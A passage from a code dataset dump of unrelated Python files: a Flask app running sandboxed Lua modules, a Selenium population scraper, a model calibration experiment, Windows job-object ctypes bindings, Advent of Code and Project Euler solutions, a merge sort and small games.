main()\n","sub_path":"get_value_by_serial.py","file_name":"get_value_by_serial.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"73083833","text":"# coding=utf-8\nimport os\n# import ConfigParser\nimport settings\nimport lupa\nimport json\n\n# from werkzeug.utils import secure_filename\n\nfrom utils import mysql\n\nfrom flask import Flask\n# from flask import render_template\nfrom flask import request, render_template_string, redirect\nfrom pages.admin import admin\nfrom pages.api import api\n\napp = Flask(__name__)\n\napp.config['DEBUG'] = True\napp.config.from_object(settings)\n\nmysql.init_app(app)\n\napp.register_blueprint(admin)\napp.register_blueprint(api, url_prefix='/api')\n\nfdb_str = '''\nfunction ()\n local m = require(\"luasql.mysql\")\n local env = m.mysql()\n local cn = env:connect(\"{}\", \"{}\", \"{}\")\n return cn\nend\n'''\n\n\n@app.route(\"/\")\ndef hello():\n return 
redirect(\"/login\")\n\n\n@app.route(\"/html//.html\")\ndef html_file(module_name, html_file):\n if not os.path.isfile(\"modules/html/{}/{}.html\".format(module_name, html_file)):\n return \"Нет такого файла\"\n with open(\"modules/html/{}/{}.html\".format(module_name, html_file), 'r') as html_f:\n html_text = unicode(html_f.read(), 'utf-8')\n if not os.path.isfile(\"modules/html/{}/{}.lua\".format(module_name, html_file)):\n return render_template_string(html_text)\n lua = lupa.LuaRuntime()\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT id, approved, activated, has_settings FROM Module WHERE name=%s\", (module_name,))\n data = cursor.fetchone()\n if data is None or data[1] != 1 or data[2] != 1:\n return \"no module\"\n\n sandbox = lua.eval(\"{}\")\n sandbox['string'] = lua.eval(\"string\")\n sandbox['math'] = lua.eval(\"math\")\n sandbox['error'] = lua.eval(\"error\")\n sandbox['tonumber'] = lua.eval(\"tonumber\")\n sandbox['db'] = lua.eval(fdb_str.format(settings.MYSQL_DATABASE_DB, \"m{}\".format(data[0]), \"qwe123\"))()\n\n args = dict(request.args)\n sandbox['args'] = lua.table_from(args)\n\n mod_settings = {}\n if data[3] == 1:\n cursor.execute(\"SELECT name, type, value FROM Module_setting WHERE module_id=%s\", (data[0],))\n sd = cursor.fetchall()\n for row in sd:\n val = row[2]\n if row[1] == 'int':\n val = int(val)\n elif row[1] == 'boolean':\n val = True if val == \"true\" else False\n mod_settings[row[0]] = val\n if len(mod_settings) != 0:\n sandbox['settings'] = lua.table_from(mod_settings)\n\n setfenv = lua.eval(\"setfenv\")\n setfenv(0, sandbox)\n\n with open(\"modules/html/{}/{}.lua\".format(module_name, html_file), 'r') as f:\n lua_code = f.read()\n try:\n method = lua.eval(lua_code)\n except lupa.LuaSyntaxError:\n return \"lua syntax error\"\n # except:\n # return \"error occurred\"\n try:\n res = to_dict(method())\n except lupa.LuaError as e:\n return \"lua error: {}\".format(e)\n # except:\n # return \"error 
occurred\"\n return render_template_string(html_text, **res)\n\n\n@app.route(\"/api//\", methods=[\"POST\", \"GET\"])\ndef module_api(module_name, module_method):\n lua = lupa.LuaRuntime()\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT id, approved, activated, has_settings FROM Module WHERE name=%s\", (module_name,))\n data = cursor.fetchone()\n if data is None or data[1] != 1 or data[2] != 1:\n return \"no module\"\n if not os.path.isfile(\"lua/modules/{}/{}.lua\".format(module_name, module_method)):\n return \"no method\"\n\n sandbox = lua.eval(\"{}\")\n sandbox['string'] = lua.eval(\"string\")\n sandbox['math'] = lua.eval(\"math\")\n sandbox['error'] = lua.eval(\"error\")\n sandbox['tonumber'] = lua.eval(\"tonumber\")\n sandbox['db'] = lua.eval(fdb_str.format(settings.MYSQL_DATABASE_DB, \"m{}\".format(data[0]), \"qwe123\"))()\n\n if request.method == 'POST':\n args = dict(request.form)\n else:\n args = dict(request.args)\n sandbox['args'] = lua.table_from(args)\n sandbox['method'] = request.method\n\n mod_settings = {}\n if data[3] == 1:\n cursor.execute(\"SELECT name, type, value FROM Module_setting WHERE module_id=%s\", (data[0],))\n sd = cursor.fetchall()\n for row in sd:\n val = row[2]\n if row[1] == 'int':\n val = int(val)\n elif row[1] == 'boolean':\n val = True if val == \"true\" else False\n mod_settings[row[0]] = val\n if len(mod_settings) != 0:\n sandbox['settings'] = lua.table_from(mod_settings)\n\n setfenv = lua.eval(\"setfenv\")\n setfenv(0, sandbox)\n\n with open(\"lua/modules/{}/{}.lua\".format(module_name, module_method)) as f:\n lua_code = f.read()\n try:\n method = lua.eval(lua_code)\n except lupa.LuaSyntaxError:\n return \"lua syntax error\"\n except:\n return \"error occurred\"\n try:\n res = to_dict(method())\n except lupa.LuaError as e:\n return \"lua error: {}\".format(e)\n except:\n return \"error occurred\"\n return json.dumps(res)\n\n\ndef to_dict(t1):\n for tu in t1.items():\n if lupa.lua_type(tu[1]) == 
'table':\n t1[tu[0]] = to_dict(tu[1])\n try:\n l = sorted(t1.keys())\n if len(l) != 0 and l == range(1, l[-1] + 1):\n return list(t1.values())\n except TypeError:\n pass\n return dict(t1)\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"server_files/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"6634304","text":"#!/usr/bin/env python3\n\nuser1 = {\"name\": \"Chris\",\n \"city\": \"Seattle\",\n \"cake\": \"Chololate\"}\n\n\ndef dict1(user_input):\n print(user_input)\n user_input.pop(\"cake\")\n print(user_input)\n user_input.update({\"fruit\": \"Mango\"})\n print(user_input.keys())\n print(user_input.values())\n print(\"cake\" in user_input.keys())\n print(\"Mango\" in user_input.values())\n\n\ndef dict2(user_input):\n for key, val in user_input.items():\n print(\"%s: %s\" % (key, val.lower().count('t')))\n\n\ndef sets_1():\n s2 = set()\n s3 = set()\n s4 = set()\n for num in range(1, 21):\n if num % 2 == 0:\n s2.update([num])\n if num % 3 == 0:\n s3.update([num])\n if num % 4 == 0:\n s4.update([num])\n print(s2)\n print(s3)\n print(s4)\n print(s3.issubset(s2))\n print(s4.issubset(s2))\n\n\ndef sets_2():\n py_set = set('python')\n py_set.update(['i'])\n print(py_set)\n\n fs = frozenset('marathon')\n union_set = fs.union(py_set)\n inter_set = fs.intersection(py_set)\n print(union_set)\n print(inter_set)\n\nsets_2()\n\n","sub_path":"students/chrissp/lesson04/dict_lab.py","file_name":"dict_lab.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"631398063","text":"from selenium import webdriver\r\nimport pandas as pd\r\nimport time\r\nimport os\r\n\r\nbrowser = webdriver.Chrome(\"B:\\\\Alien Brain\\\\Python 
Warm-Up\\\\chromedriver.exe\")\r\nbrowser.get(\"https://www.worldometers.info/population/countries-in-asia-by-population/\")\r\ntime.sleep(5)\r\n\r\ndf = pd.DataFrame(columns=['Rank','Country','Population','Yearly Change','Net Change','Density(P/Km²)','Land Area(Km²)','Migrants(net)','Fert.Rate','Med.Age','UrbanPop %','World Share'])\r\n\r\nfor i in browser.find_elements_by_xpath('//*[@id=\"example2\"]/tbody/tr'):\r\n\ttd_list = i.find_elements_by_tag_name('td')\r\n\trow = []\r\n\tfor td in td_list:\r\n\t\trow.append(td.text)\r\n\tdata = {}\r\n\tfor j in range(len(df.columns)):\r\n\t\tdata[df.columns[j]] = row[j]\r\n\tdf=df.append(data,ignore_index=True)\r\n\r\nbrowser.close()\r\nprint(df)\r\n\r\nbase_path='B:\\\\Alien Brain\\\\Python Warm-Up'\r\n\r\npath=os.path.join(base_path,'Dataset1.csv')\r\n#os.mkdir(path)\r\ndf.to_csv(path, index = False)\r\nprint(\"The dataset has been saved at the loction: \"+path)\r\n","sub_path":"Challenge7 - Asian Country Population Information.py","file_name":"Challenge7 - Asian Country Population Information.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"536164785","text":"from sklearn.model_selection import StratifiedKFold\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.dummy import DummyClassifier\n\nfrom pandas import read_csv, DataFrame\nimport numpy as np\n\nimport os\nimport sys\nfrom autoclf import auto_utils as au\nfrom autoclf.classification import eval_utils as eu\nfrom autoclf.classification import param_grids_distros as pgd\nfrom autoclf.classification import train_calibrate as tc\nimport autoclf.getargs as ga\nfrom pkg_resources import resource_string\nfrom io import StringIO\n\n\n# starting program\nif __name__ == '__main__':\n\n print()\n print(\"### Probability Calibration Experiment -- CalibratedClassifierCV \"\n \"with cv=cv (no prefit) ###\")\n print()\n\n d_name = ga.get_name()\n\n if d_name is None:\n d_name 
= \"OttoG\"\n\n seed = 7\n np.random.seed(seed)\n\n try:\n df = read_csv(\"datasets/otto_group_train.csv\", delimiter=\",\")\n except FileNotFoundError as fe:\n ottog_bytes = resource_string(\n \"autoclf\", os.path.join(\"datasets\", 'otto_group_train.csv'))\n ottog_file = StringIO(str(ottog_bytes,'utf-8'))\n\n df = read_csv(ottog_file, delimiter=\",\")\n except Exception as e:\n raise e\n\n print(df.shape)\n\n print(\"Dataframe description - no encoding:\\n\", df.describe())\n print()\n\n print()\n print(\"=== [task] Train-test split + early pre-processing.\")\n print()\n\n # Missing Attribute Values: None\n\n ###\n df = df.drop(['id'], axis=1)\n print(df.shape)\n\n description = df.describe()\n print(\"Description - no encoding:\\n\", description)\n\n print()\n\n target = 'target'\n\n # feature engineering\n\n sltt = eu.scoring_and_tt_split(df, target, 0.2, seed)\n\n X_train, X_test, y_train, y_test = sltt['arrays']\n scoring = sltt['scoring']\n Y_type = sltt['target_type']\n labels = sltt['labels']\n\n print()\n print(\"X_train shape: \", X_train.shape)\n print(\"X_train -- first row:\", X_train.values[0])\n print(\"y_train shape: \", y_train.shape)\n print()\n\n print(\"X_test shape: \", X_test.shape)\n print(\"X_test -- first row:\", X_test.values[0])\n print(\"y_test shape: \", y_test.shape)\n print()\n\n print(y_train[:3])\n # input(\"Enter key to continue... 
\\n\")\n\n print()\n print(\"scoring:\", scoring)\n print()\n\n auto_feat_eng_data = eu.auto_X_encoding(sltt, seed)\n\n encoding = auto_feat_eng_data['encoding']\n scaler_tuple = auto_feat_eng_data['scaler']\n featselector = auto_feat_eng_data['feat_selector']\n steps = auto_feat_eng_data['steps']\n X_train_transformed, y_train, X_test_transformed, y_test =\\\n auto_feat_eng_data['data_arrays']\n X, y = auto_feat_eng_data['Xy']\n train_index, test_index = auto_feat_eng_data['tt_index']\n\n n_splits = au.select_nr_of_splits_for_kfold_cv()\n n_iter = au.select_nr_of_iterations()\n\n inner_cv = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=seed)\n outer_cv = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=seed)\n\n ### reproducing the whole autoclf workflow\n\n names = []\n results = []\n\n print(\"Metric:\", scoring)\n print(\"Calibration of untrained models -- CCCV 2nd\")\n print()\n\n best_atts = eu.best_model_initial_attributes(scoring, n_splits)\n\n best_score, best_score_dev, best_cv_results, best_model_name = best_atts\n\n best_exec_time = 31536000 # one year in seconds\n best_model = (best_model_name, None, None)\n\n Dummy_scores = []\n\n models_data = []\n names = []\n results = []\n\n scores_of_worst_model = (best_score, best_score_dev, best_cv_results,\n best_exec_time, best_model)\n\n scores_of_best_model = scores_of_worst_model\n\n average_scores_and_best_scores = dict()\n average_scores_and_best_scores[best_model_name] \\\n = (best_score, best_score_dev, best_exec_time, best_model, {})\n\n # Start evaluation process\n\n print()\n print(\"=== [task] Evaluation of DummyClassifier\")\n print()\n\n wtr = eu.calculate_sample_weight(y_train)\n\n strategy = 'stratified' # 'most_frequent'\n\n evaluation_result = eu.single_classic_cv_evaluation(\n X_train_transformed, y_train, 'DummyClf_2nd',\n DummyClassifier(strategy=strategy), wtr, scoring, outer_cv,\n dict(), scores_of_best_model, results, names, seed)\n\n 
average_scores_and_best_scores = evaluation_result[0]\n scores_of_best_model = evaluation_result[1]\n\n Dummy_scores.append(scores_of_best_model[0]) # Dummy score -- ROC_AUC\n Dummy_scores.append(scores_of_best_model[1]) # Dummy score std\n Dummy_scores.append(scores_of_best_model[2]) # Dummy cv results\n Dummy_scores.append(scores_of_best_model[3]) # Dummy execution time\n # Dummy model's name and estimator\n Dummy_scores.append(scores_of_best_model[4])\n\n names = []\n results = []\n\n print()\n\n all_models_and_parameters = dict()\n\n # replace with name from pgd.full_search_models_and_parameters\n test_model_name = 'model_from_param_grids_distros' # 'KNeighborsClf_2nd'\n\n print(\"=== [task] Comparing DummyClassifier to KNeighborsClassifier\")\n print()\n\n evaluation_result = eu.single_nested_rscv_evaluation(\n X_train_transformed, y_train, test_model_name,\n pgd.full_search_models_and_parameters[test_model_name][0], \n pgd.full_search_models_and_parameters[test_model_name][1],\n wtr, scoring, n_iter, inner_cv, outer_cv, \n average_scores_and_best_scores, scores_of_best_model, \n results, names, seed)\n\n print()\n au.box_plots_of_models_performance(results, names)\n\n print()\n print(\"=== After Non-nested CV evaluation of %s...\" % test_model_name)\n print()\n\n scores_of_best_model = evaluation_result[1]\n\n best_model_name = scores_of_best_model[4][0]\n best_model_estim = scores_of_best_model[4][1]\n\n best_score = scores_of_best_model[0]\n best_score_dev = scores_of_best_model[1]\n best_cv_results = scores_of_best_model[2]\n best_exec_time = scores_of_best_model[3]\n\n Dummy_score = Dummy_scores[0]\n Dummy_score_dev = Dummy_scores[1]\n Dummy_cv_results = Dummy_scores[2]\n Dummy_exec_time = Dummy_scores[3]\n\n print()\n print(\"Currently, best model is '%s' with score '%s': %1.3f (%1.3f)... :\" %\n (best_model_name, scoring.strip('neg_'), best_score, best_score_dev))\n print(\"... 
execution time: %.2fs\" % best_exec_time)\n # print(\"and prediction confidence: %1.3f\" % best_brier_score)\n print()\n\n if best_model_name != 'DummyClf_2nd':\n # It's assumed best model's performance is\n # satistically better than that of DummyClf on this dataset\n print(\"DummyClassifier's scores -- '%s': %1.3f (%1.3f)\" % (\n scoring.strip('neg_'), Dummy_score, Dummy_score_dev))\n print(\"'%s' does better than DummyClassifier.\" % best_model_name)\n if best_exec_time < Dummy_exec_time:\n print(\"'%s' is quicker than DummyClf.\" % best_model_name)\n print()\n print()\n input(\"Press key to continue...\")\n\n preprocessing = (encoding, scaler_tuple, featselector)\n\n all_models_and_parameters[best_model_name] = (\n best_model, pgd.full_search_models_and_parameters[best_model_name][1])\n\n if labels is not None:\n print(\"You have labels:\", labels)\n all_models_and_parameters['labels'] = labels\n\n print(\"Defined dictionary with models, parameters and related data.\")\n print()\n\n tc.tune_calibrate_best_model(\n X, y, X_train_transformed, X_test_transformed,\n y_train, y_test, auto_feat_eng_data['tt_index'], \n preprocessing, scores_of_best_model,\n all_models_and_parameters, n_splits, n_iter, 0,\n scoring, models_data, d_name, seed)\n else:\n sys.exit(\"Your best classifier is not a good classifier.\")\n\n input(\"=== [End Of Program] Enter key to continue... 
\\n\")","sub_path":"examples/ottog_knc_exp.py","file_name":"ottog_knc_exp.py","file_ext":"py","file_size_in_byte":7898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"594581882","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 18 00:48:45 2018\nFile Name: Project Euler - Problem 16\n@author: PianoManDan\n\nProblem: 2^15 = 32768, and the sum of its digits is 3 + 2 + 7 + 6 + 8 = 26.\n What is the sum of the digits of 2^1000\n\"\"\"\n\n\n# Define a function that takes a number and sums it's digits\n# PARAMETERS:\n# input n: integer whose digits are to be summed\n# ouput: the sum of the digits of n\n\ndef sumDigits(n):\n assert isinstance(n, int), \"Input must be an integer\"\n \n n = str(n)\n digits = []\n \n for i in range(len(n)):\n digits.append(int(n[i]))\n \n return sum(digits)\n\n\n# Calculate the sum of the digits of 2^1000 and print the answer to the console.\nans = sumDigits(2**1000)\n\nprint(\"The sum of the digits of 2^1000 is %d.\" %ans)\n","sub_path":"Problem 016.py","file_name":"Problem 016.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"511170300","text":"#\n# Copyright (C) 2017 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\"\"\"Python interfaces for win32 APIs.\"\"\"\nfrom __future__ import absolute_import\nfrom typing import Optional\n\nimport 
ctypes\nimport ctypes.wintypes\n\n\n# From winnt.h\nJOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE = 0x00002000\nJobObjectExtendedLimitInformation = 9\n\n\nclass IO_COUNTERS(ctypes.Structure):\n _fields_ = [\n ('ReadOperationCount', ctypes.c_ulonglong),\n ('WriteOperationCount', ctypes.c_ulonglong),\n ('OtherOperationCount', ctypes.c_ulonglong),\n ('ReadTransferCount', ctypes.c_ulonglong),\n ('WriteTransferCount', ctypes.c_ulonglong),\n ('OtherTransferCount', ctypes.c_ulonglong),\n ]\n\n\nclass JOBOBJECT_BASIC_LIMIT_INFORMATION(ctypes.Structure):\n _fields_ = [\n ('PerProcessUserTimeLimit', ctypes.wintypes.LARGE_INTEGER),\n ('PerJobUserTimeLimit', ctypes.wintypes.LARGE_INTEGER),\n ('LimitFlags', ctypes.wintypes.DWORD),\n ('MinimumWorkingSetSize', ctypes.c_size_t),\n ('MaximumWorkingSetSize', ctypes.c_size_t),\n ('ActiveProcessLimit', ctypes.wintypes.DWORD),\n ('Affinity', ctypes.POINTER(ctypes.c_ulong)),\n ('PriorityClass', ctypes.wintypes.DWORD),\n ('SchedulingClass', ctypes.wintypes.DWORD),\n ]\n\nclass JOBOBJECT_EXTENDED_LIMIT_INFORMATION(ctypes.Structure):\n _fields_ = [\n ('BasicLimitInformation', JOBOBJECT_BASIC_LIMIT_INFORMATION),\n ('IoInfo', IO_COUNTERS),\n ('ProcessMemoryLimit', ctypes.c_size_t),\n ('JobMemoryLimit', ctypes.c_size_t),\n ('PeakProcessMemoryUsed', ctypes.c_size_t),\n ('PeakJobMemoryUsed', ctypes.c_size_t),\n ]\n\n\n# mypy needs to ignore this line because this only typechecks successfully for\n# Windows.\nclass UseLastErrorWinDLL(ctypes.WinDLL): # type: ignore\n def __init__(self,\n name: str,\n mode: int = ctypes.DEFAULT_MODE,\n handle: int = None) -> None:\n super().__init__(name, mode, handle, use_last_error=True)\n\n_LOADER = ctypes.LibraryLoader(UseLastErrorWinDLL)\n\n\ndef CreateJobObject(attributes: Optional[ctypes.Structure] = None,\n name: str = None) -> ctypes.wintypes.HANDLE:\n fn_CreateJobObjectW = _LOADER.kernel32.CreateJobObjectW\n fn_CreateJobObjectW.restype = ctypes.wintypes.HANDLE\n fn_CreateJobObjectW.argtypes = [ctypes.c_void_p, 
ctypes.c_wchar_p]\n job = fn_CreateJobObjectW(attributes, name)\n if job is None:\n # Automatically calls GetLastError and FormatError for us to create the\n # WindowsError exception.\n raise ctypes.WinError(ctypes.get_last_error()) # type: ignore\n return job\n\n\ndef SetInformationJobObject(job: ctypes.wintypes.HANDLE, info_class: int,\n info: ctypes.Structure) -> None:\n fn_SetInformationJobObject = _LOADER.kernel32.SetInformationJobObject\n fn_SetInformationJobObject.restype = ctypes.wintypes.BOOL\n fn_SetInformationJobObject.argtypes = [\n ctypes.wintypes.HANDLE,\n ctypes.c_int,\n ctypes.c_void_p,\n ctypes.wintypes.DWORD\n ]\n result = fn_SetInformationJobObject(job, info_class, ctypes.pointer(info),\n ctypes.sizeof(info))\n if not result:\n raise ctypes.WinError(ctypes.get_last_error()) # type: ignore\n\n\ndef AssignProcessToJobObject(job: ctypes.wintypes.HANDLE,\n process: ctypes.wintypes.HANDLE) -> None:\n fn_AssignProcessToJobObject = _LOADER.kernel32.AssignProcessToJobObject\n fn_AssignProcessToJobObject.restype = ctypes.wintypes.BOOL\n fn_AssignProcessToJobObject.argtypes = [ctypes.wintypes.HANDLE, ctypes.wintypes.HANDLE]\n if not fn_AssignProcessToJobObject(job, process):\n raise ctypes.WinError(ctypes.get_last_error()) # type: ignore\n\n\ndef GetCurrentProcess() -> ctypes.wintypes.HANDLE:\n fn_GetCurrentProcess = _LOADER.kernel32.GetCurrentProcess\n fn_GetCurrentProcess.restype = ctypes.wintypes.HANDLE\n return fn_GetCurrentProcess()\n\n\ndef CloseHandle(handle: ctypes.wintypes.HANDLE) -> None:\n fn_CloseHandle = _LOADER.kernel32.CloseHandle\n fn_CloseHandle.restype = ctypes.wintypes.BOOL\n fn_CloseHandle.argtypes = [ctypes.wintypes.HANDLE]\n if not fn_CloseHandle(handle):\n raise ctypes.WinError(ctypes.get_last_error()) # type: ignore\n","sub_path":"ndk/win32.py","file_name":"win32.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"176292649","text":"from numpy import loadtxt\nfrom pylab import scatter,xlabel,ylabel,show\n\n\ndata = loadtxt(\"millikan.txt\",float)\nx = data[:,0]\ny = data[:,0]\n\nscatter(x,y)\nxlabel(\"x\")\nylabel(\"y\")\nshow()\n","sub_path":"problem3-8a.py","file_name":"problem3-8a.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561513347","text":"import keyboard\r\nimport os\r\nimport time\r\nimport json\r\n\r\n\r\n# Map dimensions = X Y\r\n# = 1000\r\n\r\n\r\nPlocX = 500\r\nPlocY = 0\r\n\r\n\r\ndef header():\r\n print(\"\\n The Lazer Soldier\\n\" +\r\n \" --By Ihsan-- | \" +\r\n str(\"ll\") + \" FPS |\")\r\n print(\"X: \" + str(PlocX) + \" ,Y: \" + str(PlocY))\r\n print(\"_\" * 120)\r\n\r\n\r\ndef play(data):\r\n print(\"Data Loaded\")\r\n os.system(\"cls\")\r\n\r\n while True:\r\n header()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n os.system(\"titile 2D Game Adventurer | Made By Ihsan\")\r\n # file = open(\"data_2dgameadv.json\", \"+\")\r\n # data = json.JSONEncoder().encode(file.read)\r\n #\r\n # JSON Data structure\r\n # {\r\n # \"game\":{\r\n # [\r\n # {\r\n # \"name\":\"--name--\"\r\n # }\r\n # ]\r\n # }\r\n # }\r\n\r\n data = {}\r\n gamedata = {}\r\n number = 1\r\n\r\n while True:\r\n print(\" 2D Game Adventurer\")\r\n print(\" Made by Ihsan\\n\")\r\n print(\" 1. Continue saved game\")\r\n print(\" 2. New Game\")\r\n print(\" 3. 
Exit\\n\")\r\n\r\n inp = input(\"Choose: \")\r\n os.system(\"cls\")\r\n\r\n if inp == 1:\r\n if len(data[\"game\"]) != 0:\r\n while True:\r\n for a in data[\"game\"]:\r\n print(str(number) + a[\"name\"])\r\n inp = input(\"Choose: \")\r\n if not (int(inp) - 1) > len(data[\"game\"]):\r\n print(\"Loading Data...\")\r\n play(data[\"game\"])\r\n break\r\n\r\n # file.close()\r\n","sub_path":"old-codes/2dGameAdventurer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"1709634","text":"# http://adventofcode.com/2016/day/1\r\n\r\n# Part 1\r\n\r\ninstructions = \"R2, L1, R2, R1, R1, L3, R3, L5, L5, L2, L1, R4, R1, R3, L5, L5, R3, L4, L4, R5, R4, R3, L1, L2, R5, R4, L2, R1, R4, R4, L2, L1, L1, R190, R3, L4, R52, R5, R3, L5, R3, R2, R1, L5, L5, L4, R2, L3, R3, L1, L3, R5, L3, L4, R3, R77, R3, L2, R189, R4, R2, L2, R2, L1, R5, R4, R4, R2, L2, L2, L5, L1, R1, R2, L3, L4, L5, R1, L1, L2, L2, R2, L3, R3, L4, L1, L5, L4, L4, R3, R5, L2, R4, R5, R3, L2, L2, L4, L2, R2, L5, L4, R3, R1, L2, R2, R4, L1, L4, L4, L2, R2, L4, L1, L1, R4, L1, L3, L2, L2, L5, R5, R2, R5, L1, L5, R2, R4, R4, L2, R5, L5, R5, R5, L4, R2, R1, R1, R3, L3, L3, L4, L3, L2, L2, L2, R2, L1, L3, R2, R5, R5, L4, R3, L3, L4, R2, L5, R5\"\r\ninstructions_list = instructions.split(', ')\r\n\r\nlocation = [0, 0]\r\ndirection = 0 # Will be 0 for north, 90 for east, 180 for south, 270 for west\r\n\r\nfor instruction in instructions_list:\r\n if instruction[0] == 'R':\r\n direction += 90\r\n else: # instuction is always L or R so no need for elif block\r\n direction -= 90\r\n if direction == 360:\r\n direction = 0\r\n elif direction == -90:\r\n direction = 270\r\n distance = int(instruction[1:]) # everything except first character\r\n if direction == 0:\r\n location[1] += distance\r\n elif direction == 90:\r\n location[0] += distance\r\n elif direction == 180:\r\n location[1] -= distance\r\n 
else:\r\n location[0] -= distance\r\n \r\nprint(location) # gives final coordinates\r\nprint(abs(location[0]) + abs(location[1])) # distance from origin\r\n\r\n# Answer: We end up at {147, -87}, 234 blocks from origin.\r\n\r\n\r\n# Part 2\r\n\r\ninstructions = \"R2, L1, R2, R1, R1, L3, R3, L5, L5, L2, L1, R4, R1, R3, L5, L5, R3, L4, L4, R5, R4, R3, L1, L2, R5, R4, L2, R1, R4, R4, L2, L1, L1, R190, R3, L4, R52, R5, R3, L5, R3, R2, R1, L5, L5, L4, R2, L3, R3, L1, L3, R5, L3, L4, R3, R77, R3, L2, R189, R4, R2, L2, R2, L1, R5, R4, R4, R2, L2, L2, L5, L1, R1, R2, L3, L4, L5, R1, L1, L2, L2, R2, L3, R3, L4, L1, L5, L4, L4, R3, R5, L2, R4, R5, R3, L2, L2, L4, L2, R2, L5, L4, R3, R1, L2, R2, R4, L1, L4, L4, L2, R2, L4, L1, L1, R4, L1, L3, L2, L2, L5, R5, R2, R5, L1, L5, R2, R4, R4, L2, R5, L5, R5, R5, L4, R2, R1, R1, R3, L3, L3, L4, L3, L2, L2, L2, R2, L1, L3, R2, R5, R5, L4, R3, L3, L4, R2, L5, R5\"\r\ninstructions_list = instructions.split(', ')\r\n\r\nlocation = [0, 0]\r\ndirection = 0 # Will be 0 for north, 90 for east, 180 for south, 270 for west\r\nunique_locations = {(0, 0)}\r\neaster_bunny_hq = None\r\n\r\nfor instruction in instructions_list:\r\n if easter_bunny_hq is not None:\r\n break # exit main loop if easter_bunny_hq is found\r\n else:\r\n if instruction[0] == 'R':\r\n direction += 90\r\n else: # instuction is always L or R so no need for elif block\r\n direction -= 90\r\n if direction == 360:\r\n direction = 0\r\n elif direction == -90:\r\n direction = 270\r\n distance = int(instruction[1:]) # everything except first character\r\n for i in range(distance): # need to track each individual step taken\r\n if direction == 0:\r\n location[1] += 1\r\n elif direction == 90:\r\n location[0] += 1\r\n elif direction == 180:\r\n location[1] -= 1\r\n else:\r\n location[0] -= 1\r\n location_tuple = tuple(location)\r\n if location_tuple not in unique_locations:\r\n unique_locations.add(location_tuple)\r\n else:\r\n easter_bunny_hq = location_tuple\r\n break # exit inner 
loop when easter_bunny_hq is found\r\n\r\nprint(easter_bunny_hq) # gives final coordinates\r\nprint(abs(easter_bunny_hq[0]) + abs(easter_bunny_hq[1])) # distance from origin\r\n\r\n# Answer: We end up at (16, -97), 113 blocks from origin.\r\n\r\n","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"137874905","text":"#The code was run on PYCHARM IDE on WINDOWS python version 3.x\n'''\nSteps to recreate:\n1)Open PYCHARM\n2)Create a new project\n3) Add a new python file and paste the code\n4) Run the code\n'''\nimport time\ndef merge(arr,left,mid,right):\n swaps=0\n l_arr=[]\n r_arr=[]\n n = mid-left+1\n m = right-mid\n for i in range(0,n):\n l_arr.append(arr[left+i])\n for j in range(0,m):\n r_arr.append(arr[mid+1+j])\n\n i=j=0\n k=left\n\n while i 690 or car[0][1] >= 660 or car[0][0] < 100 or car[0][1] < 20:\n if car[0][0] > 690:\n car[0] = (car[0][0] - 600, car[0][1])\n if car[0][1] >= 660:\n car[0] = (car[0][0], car[0][1] - 660)\n if car[0][0] < 100:\n car[0] = (car[0][0] + 600, car[0][1])\n if car[0][1] < 20:\n car[0] = (car[0][0], car[0][1] + 660)\n #game_over = True\n #break\n if car2[0][0] > 690 or car2[0][1] >= 660 or car2[0][0] < 100 or car2[0][1] < 20:\n if car2[0][0] > 690:\n car2[0] = (car2[0][0] - 600, car2[0][1])\n if car2[0][1] >= 660:\n car2[0] = (car2[0][0], car2[0][1] - 660)\n if car2[0][0] < 100:\n car2[0] = (car2[0][0] + 600, car2[0][1])\n if car2[0][1] < 20:\n car2[0] = (car2[0][0], car2[0][1] + 660)\n #game_over = True\n #break\n # checando empate\n if num_players == 2:\n if collision(car[0], car2[0]):\n explosion_sound.play()\n screen.blit(explosion_form, (car[0][0] - 5, car[0][1] - 4))\n pygame.display.update()\n sleep(0.5)\n empate = True\n game_over = True\n break\n\n for i in range(1, len(car) - 1): #colisão entre player 1 em si mesmo\n if car[0][0] == car[i][0] and car[0][1] == car[i][1] and start:\n 
